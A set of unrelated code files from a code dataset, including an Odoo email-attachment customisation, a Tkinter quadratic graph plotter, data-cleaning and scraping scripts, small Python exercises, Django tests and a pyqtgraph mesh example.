setattr(self, fname, value)\n\n def onchange_template_id(self, template_id, composition_mode, model, res_id):\n \"\"\" - mass_mailing: we cannot render, so return the template values\n - normal mode: return rendered values\n /!\\ for x2many field, this onchange return command instead of ids\n \"\"\"\n if template_id and composition_mode == 'mass_mail':\n template = self.env['mail.template'].browse(template_id)\n fields = ['subject', 'body_html', 'email_from', 'reply_to', 'mail_server_id']\n values = dict((field, getattr(template, field)) for field in fields if getattr(template, field))\n if template.attachment_ids:\n values['attachment_ids'] = [att.id for att in template.attachment_ids]\n if template.mail_server_id:\n values['mail_server_id'] = template.mail_server_id.id\n if template.user_signature and 'body_html' in values:\n signature = self.env.user.signature\n values['body_html'] = tools.append_content_to_html(values['body_html'], signature, plaintext=False)\n elif template_id:\n values = self.generate_email_for_composer(template_id, [res_id])[res_id]\n # transform attachments into attachment_ids; not attached to the document because this will\n # be done further in the posting process, allowing to clean database if email not send\n\n attachment_ids = []\n ##########################\n if(model == 'sale.order'):\n sale_order = self.env['sale.order'].search([('id','=', self.res_id)])\n \n if(sale_order and sale_order.x_studio_oportunidad):\n crm_lead = self.env['crm.lead'].search([('id','=',sale_order.x_studio_oportunidad.id)])\n if(crm_lead):\n \n crm_attachment_ids = self.env['ir.attachment'].search(['&',('res_model','=','crm.lead'),('res_id', '=', crm_lead.id)])\n if(crm_attachment_ids):\n for line in crm_attachment_ids:\n attachment_ids.append(line.id)\n \n # sale_order_attachment_ids = self.env['ir.attachment'].search(['&',('res_model','=','sale.order'),('res_id', 'in', crm_lead.order_ids.ids)])\n # if(sale_order_attachment_ids):\n # attachment_ids.append(sale_order_attachment_ids.ids)\n\n for line in crm_lead.order_ids:\n if(line.state == 'draft' and line.id != res_id):\n template_values = self.env['mail.template'].with_context(tpl_partners_only=True).browse(template_id).generate_email(line.id, fields=['attachment_ids'])\n values['attachments'].append(template_values['attachments'][0])\n\n\n ##########################\n\n Attachment = self.env['ir.attachment']\n for attach_fname, attach_datas in values.pop('attachments', []):\n data_attach = {\n 'name': attach_fname,\n 'datas': attach_datas,\n 'res_model': 'mail.compose.message',\n 'res_id': 0,\n 'type': 'binary', # override default_type from context, possibly meant for another model!\n }\n attachment_ids.append(Attachment.create(data_attach).id)\n if values.get('attachment_ids', []) or attachment_ids:\n values['attachment_ids'] = [(6, 0, values.get('attachment_ids', []) + attachment_ids)]\n else:\n default_values = self.with_context(default_composition_mode=composition_mode, default_model=model, default_res_id=res_id).default_get(['composition_mode', 'model', 'res_id', 'parent_id', 'partner_ids', 'subject', 'body', 'email_from', 'reply_to', 'attachment_ids', 'mail_server_id'])\n values = dict((key, default_values[key]) for key in ['subject', 'body', 'partner_ids', 'email_from', 'reply_to', 'attachment_ids', 'mail_server_id'] if key in default_values)\n\n if values.get('body_html'):\n values['body'] = values.pop('body_html')\n\n # This onchange should return command instead of ids for x2many field.\n values = self._convert_to_write(values)\n\n return {'value': values}\n\n @api.model\n def generate_email_for_composer(self, template_id, res_ids, fields=None):\n \"\"\" Call email_template.generate_email(), get fields relevant for\n mail.compose.message, transform email_cc and email_to into partner_ids \"\"\"\n multi_mode = True\n if isinstance(res_ids, int):\n multi_mode = False\n res_ids = [res_ids]\n\n if fields is None:\n fields = ['subject', 'body_html', 'email_from', 'email_to', 'partner_to', 'email_cc', 'reply_to', 'attachment_ids', 'mail_server_id']\n returned_fields = fields + ['partner_ids', 'attachments']\n values = dict.fromkeys(res_ids, False)\n\n template_values = self.env['mail.template'].with_context(tpl_partners_only=True).browse(template_id).generate_email(res_ids, fields=fields)\n for res_id in res_ids:\n res_id_values = dict((field, template_values[res_id][field]) for field in returned_fields if template_values[res_id].get(field))\n res_id_values['body'] = res_id_values.pop('body_html', '')\n values[res_id] = res_id_values\n\n return multi_mode and values or values[res_ids[0]]\n\n\n\nclass mail_custom_1(models.Model):\n \n _inherit = 'mail.template'\n\n def generate_email(self, res_ids, fields=None):\n \"\"\"Generates an email from the template for given the given model based on\n records given by res_ids.\n\n :param res_id: id of the record to use for rendering the template (model\n is taken from template definition)\n :returns: a dict containing all relevant fields for creating a new\n mail.mail entry, with one extra key ``attachments``, in the\n format [(report_name, data)] where data is base64 encoded.\n \"\"\"\n self.ensure_one()\n multi_mode = True\n if isinstance(res_ids, int):\n res_ids = [res_ids]\n multi_mode = False\n if fields is None:\n fields = ['subject', 'body_html', 'email_from', 'email_to', 'partner_to', 'email_cc', 'reply_to', 'scheduled_date']\n\n res_ids_to_templates = self.get_email_template(res_ids)\n\n # templates: res_id -> template; template -> res_ids\n templates_to_res_ids = {}\n for res_id, template in res_ids_to_templates.items():\n templates_to_res_ids.setdefault(template, []).append(res_id)\n\n results = dict()\n for template, template_res_ids in templates_to_res_ids.items():\n Template = self.env['mail.template']\n # generate fields value for all res_ids linked to the current template\n if template.lang:\n Template = Template.with_context(lang=template._context.get('lang'))\n for field in fields:\n Template = Template.with_context(safe=field in {'subject'})\n generated_field_values = Template._render_template(\n getattr(template, field), template.model, template_res_ids,\n post_process=(field == 'body_html'))\n for res_id, field_value in generated_field_values.items():\n results.setdefault(res_id, dict())[field] = field_value\n # compute recipients\n if any(field in fields for field in ['email_to', 'partner_to', 'email_cc']):\n results = template.generate_recipients(results, template_res_ids)\n # update values for all res_ids\n for res_id in template_res_ids:\n values = results[res_id]\n # body: add user signature, sanitize\n if 'body_html' in fields and template.user_signature:\n signature = self.env.user.signature\n if signature:\n values['body_html'] = tools.append_content_to_html(values['body_html'], signature, plaintext=False)\n if values.get('body_html'):\n values['body'] = tools.html_sanitize(values['body_html'])\n # technical settings\n values.update(\n mail_server_id=template.mail_server_id.id or False,\n auto_delete=template.auto_delete,\n model=template.model,\n res_id=res_id or False,\n attachment_ids=[attach.id for attach in template.attachment_ids],\n )\n\n # Add report in attachments: generate once for all template_res_ids\n if template.report_template:\n for res_id in template_res_ids:\n attachments = []\n report_name = self._render_template(template.report_name, template.model, res_id)\n report = template.report_template\n report_service = report.report_name\n\n if report.report_type in ['qweb-html', 'qweb-pdf']:\n result, format = report.render_qweb_pdf([res_id])\n else:\n res = report.render([res_id])\n if not res:\n raise UserError(_('Unsupported report type %s found.') % report.report_type)\n result, format = res\n\n # TODO in trunk, change return format to binary to match message_post expected format\n result = base64.b64encode(result)\n\n ###########################################################\n\n if(self.model == \"account.move\" and self.name == \"Invoice: Send by email\"):\n sign_pdf_api = self.env['ir.config_parameter'].sudo().get_param('x_sign_pdf_url_api')\n api_token = self.env['ir.config_parameter'].sudo().get_param('x_api_token')\n paramaters = {\n 'api_token': str(api_token),\n 'pdf_file': result.decode('utf-8') \n }\n #.decode('utf-8')\n\n pdf_sign = requests.post(\\\n sign_pdf_api, \n headers={'Content-type': 'application/json', 'Accept': 'application/json'}, \\\n data=json.dumps(paramaters))\n\n if(pdf_sign):\n if(pdf_sign.status_code == 200):\n response_sign = json.loads(pdf_sign.text)\n result = response_sign['certified_file']\n \n ###########################################################\n\n\n if not report_name:\n report_name = 'report.' + report_service\n ext = \".\" + format\n if not report_name.endswith(ext):\n report_name += ext\n attachments.append((report_name, result))\n results[res_id]['attachments'] = attachments\n\n return multi_mode and results or results[res_ids[0]]","sub_path":"custom_modules/sale_mail_attachment_custom/models/sale_mail_attachment.py","file_name":"sale_mail_attachment.py","file_ext":"py","file_size_in_byte":17933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"362415006","text":"'''\nName: Prachi Santosh kolte\n\nFile description: This file contains the graph plotter user need to provide a,b,c cordinates of the equation which calculates values of\nY based on X range [-5,5] and plot the graph in the form of line and points\nsteps to run:\n1. intially program starts with some basic values which respresents the simple equation\n2.User need to click on new equation or select from menu to get graph of new equation\n3. There are certain mathematical validations provided to input of the a,b,c values\n4. After inputing the value and sucessful submission select the option from radio button the way you want to display the graph\n5. Also can choose to clear the current graph or can change the graph from dotted to direct line also\n6. you can also save your graph .ps in current directory\n\n\n'''\n\n\n\n\n\n\n\n\n\nfrom tkinter import *\nimport tkinter\nimport tkinter.messagebox\nfrom tkinter import messagebox\n\n\nclass CoefficientsDialog:\n def __init__(self, master):\n self.parent = master\n self.coefficients = None # Default value, to say its not been set yet\n\n self.master = Toplevel(self.parent)\n self.master.transient(self.parent)\n\n self.master.title(\"Coefficients \")\n self.lbl1 = Label(self.master, text=\"X^2 +\").grid(row=0, column=1, sticky=E)\n self.lbl2 = Label(self.master, text=\"X +\").grid(row=1, column=1, sticky=E)\n self.lbl3 = Label(self.master, text=\" +\").grid(row=2, column=1, sticky=E)\n self.ent1 = Entry(self.master)\n self.ent1.grid(row=0, column=0)\n self.ent2 = Entry(self.master)\n self.ent2.grid(row=1, column=0)\n self.ent3 = Entry(self.master)\n self.ent3.grid(row=2, column=0)\n btn1 = tkinter.Button(self.master, text=\"Submit\", command=self.submit, image=None)\n btn1.grid()\n\n def submit(self, event=None):\n '''\n Handle submit button action\n '''\n\n try:\n data = int(self.ent1.get())\n if data == 0:\n raise Exception\n data2 = int(self.ent2.get())\n data3 = int(self.ent3.get())\n print (data)\n print (data2)\n print (data3)\n self.coefficients={'a':data,'b':data2,'c':data3}\n self.master.destroy()\n\n except ValueError:\n\n error_window = tkinter.Tk()\n error_window.title(\"Error\")\n error_window.geometry(\"200x200\")\n label = Label(error_window, text=\"Please enter integer\", height=0, width=100)\n b = Button(error_window, text=\"Ok\", width=20, command=error_window.destroy)\n label.pack()\n b.pack(side='bottom', padx=0, pady=0)\n except Exception as e:\n error_window = tkinter.Tk()\n error_window.title(\"Error\")\n error_window.geometry(\"100x100\")\n label = Label(error_window, text=\"X^2 value can not be 0\", height=0, width=100)\n b = Button(error_window, text=\"Ok\", width=20, command=error_window.destroy)\n label.pack()\n b.pack(side='bottom', padx=0, pady=0)\n def show(self):\n self.toplevel.deiconify()\n self.toplevel.wait_window()\n value = self.var.get()\n return value\n\n\nclass QuadEQPlot:\n def __init__(self,a,b,c):\n self.a = a\n self.b = b\n self.c = c\n self.x_values = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5]\n self.y_values = []\n # print(self.x_values)\n self.init_widget()\n\n self.window.mainloop()\n\n def hello(self):\n print(\"hello!\")\n\n def init_widget(self):\n self.coefficientsDialog = None\n self.window = tkinter.Tk()\n # self.window.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\n self.window.title(\"Function Plot\")\n self.eqation = \"No Equation\"\n self.height = 700\n self.width = 700\n self.window.geometry(\"{}x{}\".format(self.width, self.height))\n\n self.root = tkinter.Frame(self.window)\n self.root.pack(expand=True, fill=\"both\")\n\n self.new_equation = Button(self.root, text=\"New Equation\", width=20, command=self.get_new_coefficient)\n self.new_equation.pack()\n\n self.labelframe = LabelFrame(self.root)\n self.labelframe.pack(expand=True, fill=\"both\")\n\n self.eqationLabel = Label(self.labelframe, text=self.eqation)\n self.eqationLabel.pack(side='left')\n\n self.canvas = tkinter.Canvas(self.root, width=500, height=500, bg=\"white\")\n self.canvas.pack()\n\n self.plot_axis()\n self.plot_equation()\n\n #################radiobutton###################\n R1 = Radiobutton(self.window, text=\"Points\", command=self.plot_points)\n R1.pack(side='right')\n\n R2 = Radiobutton(self.window, text=\"Lines\", command=self.plot_line)\n R2.pack(side='right')\n ################## Menu##################\n menubar = Menu(self.window)\n\n # create a pulldown menu, and add it to the menu bar\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"New Equation\", command=self.get_new_coefficient)\n filemenu.add_command(label=\"Save plot .ps\", command=self.save_canvas)\n filemenu.add_separator()\n filemenu.add_command(label=\"Clear\", command=self.clear_canvas)\n filemenu.add_command(label=\"Exit\", command=self.exit_window)\n\n menubar.add_cascade(label=\"File\", menu=filemenu)\n\n helpmenu = Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About\", command=self.show_help_about)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n # display the menu\n self.window.config(menu=menubar)\n ##########################\n\n\n\n def plot_axis(self):\n self.canvas.create_line(250, 50, 250, 450, width=2, fill=\"blue\")\n self.canvas.create_line(50, 250, 450, 250, width=2, fill=\"blue\")\n\n def plot_equation(self):\n self.clear_canvas()\n\n self.plot_axis()\n for i in self.x_values:\n self.y_values.append(self.a * i * i + self.b * i + self.c)\n\n\n print(\"########################################\")\n print (self.y_values)\n print(\"########################################\")\n ################################\n x_x0 = 50 # x axis\n y_x0 = 250 # for x axis\n\n x_y0 = 250 # for y axis\n y_y0 = 50 # for y axis\n d = 40\n\n for i in range(-5, 6):\n self.canvas.create_line(x_x0, y_x0, x_x0 + 1, y_x0 + 1, fill='darkblue') ## for x axis\n self.canvas.create_line(x_y0, y_y0, x_y0 + 1, y_y0 + 1, fill='darkblue') ## for y axis\n\n x_x0 = x_x0 + d\n y_y0 = y_y0 + d\n x_x0 = 50 # x axis\n y_x0 = 250 # x axis\n for value in self.x_values:\n self.canvas.create_text(x_x0, y_x0 + 5, fill=\"Black\", font=\"Times 10 italic bold\", text=value)\n print(\"x_x0:\", x_x0, value)\n x_x0 = x_x0 + d\n\n x_y0 = 250 # for y axis\n y_y0 = 50 # for y axis\n d = 40\n\n for value in self.y_values[:5]:\n print(\"*****\")\n print(value)\n self.canvas.create_text(x_y0 + 10, y_y0, fill=\"darkblue\", font=\"Times 10 italic bold\", text=value)\n\n y_y0 = y_y0 + d\n\n x_y0 = 250 # for y axis\n y_y0 = 450 # for y axis\n d = 40\n for value in self.y_values[:5]:\n print(value * (-1))\n self.canvas.create_text(x_y0 + 10, y_y0, fill=\"darkblue\", font=\"Times 10 italic bold\",\n text=value * (-1))\n\n\n y_y0 = y_y0 - d\n ########## #################################\n\n self.y_values = []\n for i in self.x_values:\n self.y_values.append(self.a * i * i + self.b * i + self.c)\n\n self.eqationLabel[\n \"text\"] = self.get_a_coeff_expression() + self.get_b_coeff_expression() + self.get_c_coeff_expression()\n\n def get_new_coefficient(self):\n if self.coefficientsDialog == None:\n self.coefficientsDialog = CoefficientsDialog(self.root)\n self.coefficientsDialog.parent.wait_window(self.coefficientsDialog.master)\n self.a = self.coefficientsDialog.coefficients['a']\n self.b = self.coefficientsDialog.coefficients['b']\n self.c = self.coefficientsDialog.coefficients['c']\n # print (self.a)\n # print (self.b)\n # print (self.c)\n self.plot_axis()\n self.plot_equation()\n self.coefficientsDialog = None\n\n\n def plot_points(self):\n self.clear_canvas()\n self.plot_axis()\n self.plot_equation()\n try:\n y_min = abs(min(self.y_values))\n y_max = abs(max(self.y_values))\n\n y_final = y_min if y_min > y_max else y_max\n y_ratio = y_final / 5\n print(y_final)\n\n for i in range(len(self.x_values)):\n x_ax = (self.x_values[i] + 5) * 40 + 50\n y_ax = (-1 * self.y_values[i] / y_ratio * 40) + 250\n #print(x_ax, y_ax)\n self.canvas.create_oval(x_ax - 2, y_ax - 2, x_ax + 2, y_ax + 2, outline=\"red\", fill=\"yellow\")\n except:\n pass\n\n\n\n def plot_line(self):\n self.clear_canvas()\n self.plot_axis()\n self.plot_equation()\n y_min = abs(min(self.y_values))\n y_max = abs(max(self.y_values))\n\n y_final = y_min if y_min > y_max else y_max\n y_ratio = y_final / 5\n print(y_final)\n lines_cordionates={}\n\n for i in range(len(self.x_values)):\n x_ax = (self.x_values[i] + 5) * 40 + 50\n y_ax = (-1 * self.y_values[i] / y_ratio * 40) + 250\n lines_cordionates[i]=x_ax,y_ax\n try:\n\n for i in range(len(self.x_values)):\n self.canvas.create_line(lines_cordionates[i][0], lines_cordionates[i][1], lines_cordionates[i+1][0], lines_cordionates[i+1][1], fill='darkblue')\n except:\n pass\n def exit_window(self):\n if messagebox.askyesno(\"Exit\", \"Do you want to quit the application?\"):\n self.window.destroy()\n\n def clear_canvas(self):\n\n self.canvas.delete(\"all\")\n\n def new_equation(self):\n self.plot_axis()\n self.y_values = []\n for i in self.x_values:\n self.y_values.append(self.a * i * i + self.b * i + self.c)\n self.plot_points()\n self.eqationLabel[\n \"text\"] = self.get_a_coeff_expression() + self.get_b_coeff_expression() + self.get_c_coeff_expression()\n\n def get_new_coefficient(self):\n if self.coefficientsDialog == None:\n self.coefficientsDialog = CoefficientsDialog(self.root)\n self.coefficientsDialog.parent.wait_window(self.coefficientsDialog.master)\n self.a = self.coefficientsDialog.coefficients['a']\n self.b = self.coefficientsDialog.coefficients['b']\n self.c = self.coefficientsDialog.coefficients['c']\n\n self.plot_axis()\n self.plot_equation()\n self.coefficientsDialog = None\n\n def get_a_coeff_expression(self):\n if self.a > 1 or self.a < -1:\n return str(self.a) + \"X\" + u\"\\u00B2\"\n elif self.a == -1:\n return \"-X\" + u\"\\u00B2\"\n else:\n return \"X\" + u\"\\u00B2\"\n\n def get_b_coeff_expression(self):\n coeef = self.b\n if coeef > 1:\n return \"+\" + str(coeef) + \"X\"\n elif coeef < -1:\n return str(coeef) + \"X\"\n elif coeef == 1:\n return \"+\" + \"X\"\n elif coeef == -1:\n return \"-\" + \"X\"\n else:\n return \"\"\n\n def get_c_coeff_expression(self):\n coeef = self.c\n if coeef > 0:\n return \"+\" + str(coeef)\n elif coeef < 0:\n return str(coeef)\n else:\n return \"\"\n\n def save_canvas(self):\n self.canvas.postscript(file=\"1017665.ps\", colormode='color')\n\n def show_help_about(self):\n top = Toplevel()\n top.title(\"About this application...\")\n\n msg = Message(top, text=\"Created by Prachi Kolte \\n UB ID: 1017665\")\n msg.pack()\n\n button = Button(top, text=\"Dismiss\", command=top.destroy)\n button.pack()\n\n\nobj = QuadEQPlot(1, 0, 0)\n\n","sub_path":"Graph_window.py","file_name":"Graph_window.py","file_ext":"py","file_size_in_byte":12327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"16231270","text":"#!/usr/bin/env python3\n\n\nimport os\nimport cv2\nimport shutil\n\nfrom utils import load_pickle_file\n\nallowed_width = 256\nallowed_height = 192 \n\nimages, labels = load_pickle_file(\"pickles/image_data_normalized.p\")\n\nif not os.path.exists(\"test_images\"):\n os.makedirs(\"test_images\")\n\nfor img_path in images:\n img = cv2.imread(img_path)\n resized_img = cv2.resize(img,(allowed_width,allowed_height))\n \n parts = img_path.split(\"/\")\n save_path = os.path.join(\"test_images\",\"_\".join(parts[-2:]))\n cv2.imwrite(save_path,resized_img)","sub_path":"build_test_images.py","file_name":"build_test_images.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"237140007","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats\nfrom scipy.stats import zscore\nimport statsmodels.api as sm\nfrom sklearn.model_selection import cross_val_score,GridSearchCV,train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LinearRegression, Lasso, Ridge\nfrom sklearn.decomposition import NMF,PCA\nfrom sklearn.metrics import accuracy_score, r2_score\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n#Here, we're importing out 500_Cities datasets\ndf = pd.read_csv('500_Cities__Local_Data_for_Better_Health__2018_release.zip')\n\n# we only need non-adusted numbers, and only for cities not electoral areas\nhealth = df[(df.Data_Value_Type=='Crude prevalence') & \n (df.GeographicLevel.isin(['City','US'])) ]\n\n# pivot so that we have Columns for all the Health Measures, instead of a Row\nhealth_pivot = pd.pivot_table(health, values='Data_Value', index=['StateDesc', 'CityName'], \n columns=['Short_Question_Text'], aggfunc=np.sum).reset_index()\n\n# Pivot table on cities & multi index categories & short question text (short for measure). average on Data Value. \ncategory = df['Category'] == 'Health Outcomes'\ndfPiv = df.pivot_table(index='CityName',columns=['Category','Short_Question_Text'],values='Data_Value',aggfunc=np.mean)\n#Create zscore for all columns to standardize data\ndfPivZscore = dfPiv.apply(zscore)\n\n#Spliting the original data into 3 parts -\n#1. Location dataset 2. Data Definition dataset 3. Data Values\ncolumns_locations = ['UniqueID','StateAbbr','StateDesc','CityName','GeographicLevel', 'TractFIPS','CityFIPS','GeoLocation']\ncolumns_data_definition = ['Category', 'CategoryID', 'Measure','MeasureId','Data_Value_Type','Short_Question_Text']\ncolumns_data = ['Data_Value','DataValueTypeID','Data_Value_Footnote_Symbol', 'Data_Value_Footnote','CategoryID',\n 'GeoLocation','Low_Confidence_Limit', 'High_Confidence_Limit','PopulationCount','StateAbbr',\n 'UniqueID','MeasureId','Year']\n\n\n#Since the column Location has 2 values(latitude, longtitude) in a column, we are splitting them into 2 different columns.\ndf_locations = df[columns_locations].copy()\nlat = []\nlong =[]\nfor row in df_locations['GeoLocation']:\n try:\n # Split the row by comma and append everything before the comma to lat\n latitude = row.split(',')[0]\n latitude = latitude[1:]\n lat.append(latitude)\n # Split the row by comma and append everything after the comma to lon\n longitude = row.split(',')[1]\n longitude = longitude[:-1]\n long.append(longitude)\n except:\n # append a missing value to lat\n lat.append(np.NaN)\n # append a missing value to lon\n long.append(np.NaN)\n# Create two new columns from lat and lon\ndf_locations['Latitude'] = lat\ndf_locations['Longitude'] = long\n\ndel df_locations['GeoLocation']\ndf_locations = df_locations.drop_duplicates().sort_values('UniqueID')\ndf_locations.to_csv('locations.csv')\n\n","sub_path":"cs418_phak/cleanDataframe_locations.py","file_name":"cleanDataframe_locations.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"458443995","text":"import requests\nfrom bs4 import BeautifulSoup\n# Take the code from the How To Decode A Website exercise\n# (if you didn’t do it or just want to play with some different code, use the code from the solution),\n# and instead of printing the results to a screen, write the results to a txt file.\n# In your code, just make up a name for the file you are saving to.\n#\n# Extras:\n#\n# Ask the user to specify the name of the output file that will be saved.\n# Discussion\n#\n# Topics:\n#\n# Writing to a file\n# Gotchas and warnings\n\n\ndef web_spider(p_f_name):\n url = \"https://www.nytimes.com/\"\n r = requests.get(url)\n r_html = r.text\n soup = BeautifulSoup(r_html, \"lxml\")\n f_path = \"c:/tmp/\"+p_f_name+\".txt\"\n f = open(f_path, \"w\", encoding='utf-8')\n for story_heading in soup.find_all(class_=\"story-heading\"):\n if story_heading.a:\n f.write(story_heading.a.text.replace(\"\\n\", \" \").strip())\n f.write(\"\\n\")\n else:\n f.write(story_heading.contents[0].strip())\n f.write(\"\\n\")\n f.close()\n print(\"all information has been done in \" + f_path)\n\nf_name = str(input(\"please input to save file name as below:\\n\"))\nweb_spider(f_name)\n","sub_path":"org/practicepython/21WriteToAFile.py","file_name":"21WriteToAFile.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"344040813","text":"N = [ int(n) for n in \"\".join([ input() for _ in range(20) ]) ]\n\nfrom functools import reduce\n\nmax_product = -1\ni = 0\nwhile i < len(N) - 13:\n print(i)\n product = 1\n A = N[i:i+13]\n \n if 0 in A:\n zero = A[::-1].index(0)\n i += 13-zero\n else:\n product = reduce(lambda x, y: x*y, A)\n if product > max_product:\n max_product = product\n\n i += 1\n\nprint(max_product)","sub_path":"python/problem_008.py","file_name":"problem_008.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"293651642","text":"import random\n\ncards = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\ncards_pos = []\npos = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n\n\nfor i in range(8):\n for j in range(2):\n cards_pos.append(cards[i])\n\nrandom.shuffle(cards_pos)\n\nevent = len(cards)\nmoves = 0\nwhile event > 0:\n x = random.choice(pos)\n choice_1 = cards_pos[x]\n t_pos = pos[:]\n t_pos.remove(x)\n y = random.choice(t_pos)\n choice_2 = cards_pos[y]\n moves += 1\n print(choice_1+\" \"+choice_2)\n if choice_1 == choice_2:\n print(\"Trafione\")\n event -=1\n pos.remove(x)\n pos.remove(y)\n\n\nprint(\"Liczba wszystkich ruchów: \"+str(moves))\n\n# while end == False:\n#\n# if move == 1:\n# if event.type == pygame.locals.MOUSEBUTTONDOWN:\n# x, y = pygame.mouse.get_pos()\n# pole = self.board.cards_pos\n# for pos in pole:\n# if pos.collidepoint(x, y):\n# t_pos = pos\n# choice_1 = self.board.unhide(pos)\n# pygame.display.update()\n# move+=1\n# elif move == 2:\n# if event.type == pygame.locals.MOUSEBUTTONDOWN:\n# x, y = pygame.mouse.get_pos()\n# pole = self.board.cards_pos\n# for pos in pole:\n# if pos.collidepoint(x, y):\n# choice_2 = self.board.unhide(pos)\n# pygame.display.update()\n# if choice_1 == choice_2:\n# print(\"trafione\")\n# else:\n# move = 1\n# self.hide(pos)\n# self.hide(t_pos)\n","sub_path":"count_rules.py","file_name":"count_rules.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"634391103","text":"\"\"\"\nAuthor: Bruno Luca\nDate: 18-08-2020\nTitle: Scrivere una funziona di nome usa_tutte che richieda una parola e \nuna stringa di lettere richieste e che restituisca True se la parola utilizza \ntutte le lettere richeiste almeno una volta\n\"\"\"\n\ndef usa_tutte(word, letter_list):\n for letter in letter_list:\n if not (letter in word):\n return False\n return True\n\nletters = input(\"Insert letters...\\n\")\nfin = open(\"words.txt\")\ncounter = 0\n\nfor line in fin:\n if usa_tutte(line.strip(), letters):\n print(line.strip())\n counter = counter + 1\n\nprint(f\"\\n\\n{counter}\") #598 words use all vocals\n\n\n","sub_path":"tpsit_IV/summer_works/es9_5.py","file_name":"es9_5.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"518290496","text":"from django.test import TestCase\nfrom django.test import Client\nimport datetime\n\n# Create your tests here.\n\nfrom .models import Rankinglist, Player, Match, Ranking\n\nclass ViewsTest(TestCase):\n def setUp(self):\n # Every test needs a client.\n self.client = Client()\n r = Rankinglist.objects.create(name=\"herren\")\n \n roger = Player.objects.create(firstname=\"Roger\",lastname=\"Federer\")\n boris = Player.objects.create(firstname=\"Boris\",lastname=\"Becker\")\n ivan = Player.objects.create(firstname=\"Ivan\",lastname=\"Lendl\")\n\n Ranking.objects.create(position=1,rankinglist=r,player=ivan)\n Ranking.objects.create(position=2,rankinglist=r,player=roger)\n Ranking.objects.create(position=3,rankinglist=r,player=boris)\n\n Match.objects.create(rankinglist=r,playerone=boris,playertwo=ivan,playedat=datetime.datetime(2020, 5, 17)) \n Match.objects.create(rankinglist=r,playerone=boris,playertwo=roger,playedat=datetime.datetime(2020, 5, 16))\n Match.objects.create(rankinglist=r,playerone=boris,playertwo=ivan,playedat=datetime.datetime(2020, 5, 15))\n\n def test_rankingliststats(self): \n r = Rankinglist.objects.get(name=\"herren\")\n\n # Issue a GET request.\n response = self.client.get('/rankinglist/rankinglist/%s/stats' %(r.id))\n\n # Check that the response is 200 OK.\n self.assertEqual(response.status_code, 200)\n\n # Check that the rendered context contains 5 customers.\n self.assertEqual(response.context['rankinglist'].name,\"herren\")\n playersList = response.context['players']\n self.assertEqual(len(playersList),3)\n for i in range(len(playersList)):\n entry = playersList[i]\n if i == 0:\n self.assertEqual(entry[0].firstname,\"Boris\")\n self.assertEqual(entry[1],3)\n elif i == 1:\n self.assertEqual(entry[0].firstname,\"Ivan\")\n self.assertEqual(entry[1],2)\n elif i == 2:\n self.assertEqual(entry[0].firstname,\"Roger\")\n self.assertEqual(entry[1],1)\n else:\n self.assertTrue(False)","sub_path":"rankinglist/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"560083309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSimple examples demonstrating the use of GLMeshItem.\n\n\"\"\"\n\n## Add path to library (just for examples; you do not need this)\n\n\nfrom pyqtgraph.Qt import QtCore, QtGui\nimport pyqtgraph as pg\nimport pyqtgraph.opengl as gl\n\napp = QtGui.QApplication([])\nw = gl.GLViewWidget()\nw.show()\nw.setWindowTitle('pyqtgraph example: GLMeshItem')\nw.setCameraPosition(distance=20)\n\ng = gl.GLGridItem()\ng.scale(1, 1, 1)\nw.addItem(g)\n\nimport numpy as np\n\n\n## Example 1:\n## Array of vertex positions and array of vertex indexes defining faces\n## Colors are specified per-face\n\nverts = np.array([\n [0, 0, 0], # 0\n [2, 0, 0], # 1\n [2, 5, 0], # 2\n [0, 5, 0], # 3\n [0, 0, 1], # 4\n [2, 0, 1], # 5\n [2, 5, 1], # 6\n [0, 5, 1], # 7\n])\nfaces = np.array([\n # bottom face\n [0, 1, 2],\n [2, 3, 0],\n # top face\n [4, 5, 6],\n [6, 7, 4],\n # back face\n [0, 1, 5],\n [0, 4, 5],\n # front face\n [2, 3, 7],\n [2, 6, 7],\n # right face\n [1, 2, 6],\n [1, 5, 6],\n # left face\n [0, 3, 7],\n [0, 4, 7],\n])\ncolors = np.array([\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0],\n [1, 0, 0, 1.0]\n])\n\n## Mesh item will automatically compute face normals.\nm1 = gl.GLMeshItem(vertexes=verts, faces=faces, smooth=False, shader='shaded', glOptions='opaque')\nm1.translate(5, 5, 0)\nm1.setGLOptions('additive')\nw.addItem(m1)\n\n#\n# ## Example 2:\n# ## 